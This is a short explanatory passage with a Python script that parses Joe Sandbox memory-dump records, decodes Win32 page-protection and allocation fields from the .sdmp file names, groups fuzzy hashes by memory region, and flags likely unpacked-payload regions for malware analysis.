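The "Memory Dump Source" entries above are the raw per-function records behind the report's similarity section; in practice an analyst wants them as structured data so the fuzzy hashes can be grouped by the memory region they came from and the interesting regions (executable, private, not backed by a PE image) can be pulled out for unpacking work. The script below is an added example and is not Joe Sandbox code; it parses a trimmed copy of two of the entries above (embedded as constructed sample text) and decodes the `.sdmp` file name on the assumption that its fourth dot-separated field is the region base address (this is checked against the report's own `Offset` value), the fifth is the Win32 page-protection constant and the seventh is the allocation type. The field layout is an assumption; only the base address is confirmed by the page itself.

```python
import re

# Constructed sample: two of the report's "Memory Dump Source" entries, indentation removed.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
• Instruction ID: b5d38caa627b03346351a44dc220841a7ed4da716cf8f49f1a18fa2232ba0421
• Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
• Instruction Fuzzy Hash: 1D01FB35A51108EFCB15EF98C284A9CB7F1FB48310F608699D8056B381C330AE41DB40
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8f68d369e7ef6a286e40a6763a3c57ceaab58be53d6a2bff1db9ef5993c4d76
• Instruction ID: 2fbfeba19a2c0a8b675e5a57fad8176e24e063abe64c295e2e28f0f21920ee39
• Opcode Fuzzy Hash: d8f68d369e7ef6a286e40a6763a3c57ceaab58be53d6a2bff1db9ef5993c4d76
• Instruction Fuzzy Hash: 43E0C266B556710BA718CD354CA02B7B7E66A87226F2CF86DD492E3109C338C4054254
"""

# Win32 memory constants (documented values from <winnt.h>).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0xF0  # any PAGE_EXECUTE* flag

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")


def parse_entries(text):
    """Split report text into one dict of 'bullet name -> value' per Memory Dump Source block."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            entries.append(cur)
        elif cur is not None:
            m = FIELD_RE.match(line)
            if m:
                cur[m.group(1).strip()] = m.group(2).strip()
    return entries


def decode_source(source_field):
    """Decode 'NAME.sdmp, Offset: XXXX, based on PE: bool'.

    ASSUMPTION: the .sdmp name fields are
    <pid>.<state>.<counter>.<base>.<protect>.<alloc_state>.<alloc_type>.<reserved>.
    Only <base> is cross-checked against the report's Offset value.
    """
    name, _, rest = source_field.partition(",")
    if name.endswith(".sdmp"):
        name = name[:-5]
    parts = name.split(".")
    if len(parts) < 7:
        raise ValueError("unexpected sdmp name: %s" % name)
    base, protect, mem_type = (int(parts[i], 16) for i in (3, 4, 6))
    offset = int(re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest).group(1), 16)
    if base != offset:
        raise ValueError("base %#x disagrees with Offset %#x" % (base, offset))
    return {
        "base": base,
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "mem_type": MEM_TYPE.get(mem_type, hex(mem_type)),
        "executable": bool(protect & EXEC_MASK),
        "writable": protect in (0x04, 0x08, 0x40, 0x80),
        "based_on_pe": "based on PE: true" in rest,
    }


def group_by_region(entries):
    """Map region base -> {'source': decoded region, 'functions': [fuzzy-hash records]}."""
    regions = {}
    for e in entries:
        src = decode_source(e["Source File"])
        rec = regions.setdefault(src["base"], {"source": src, "functions": []})
        rec["functions"].append({
            "opcode_id": e.get("Opcode ID", ""),
            "instruction_fuzzy_hash": e.get("Instruction Fuzzy Hash", ""),
            "snapshot": e.get("Snapshot File", ""),
        })
    return regions


def unpacked_candidates(regions):
    """Bases of regions that are writable+executable, private and not PE-backed:
    the usual home of an in-memory unpacked payload."""
    return sorted(
        b for b, r in regions.items()
        if r["source"]["executable"] and r["source"]["writable"]
        and r["source"]["mem_type"] == "MEM_PRIVATE" and not r["source"]["based_on_pe"]
    )


if __name__ == "__main__":
    regs = group_by_region(parse_entries(SAMPLE))
    for base, r in sorted(regs.items()):
        print("%#010x %-22s %-11s functions=%d" % (base, r["source"]["protect"],
                                                    r["source"]["mem_type"], len(r["functions"])))
    print("unpacked candidates:", [hex(b) for b in unpacked_candidates(regs)])
```

Run it against the full report text instead of `SAMPLE` to get every region and its fuzzy-hash set; the `unpacked_candidates` list is what you would dump and load into IDA first, and the per-region `instruction_fuzzy_hash` values are what you would compare across samples to confirm the same unpacked code family.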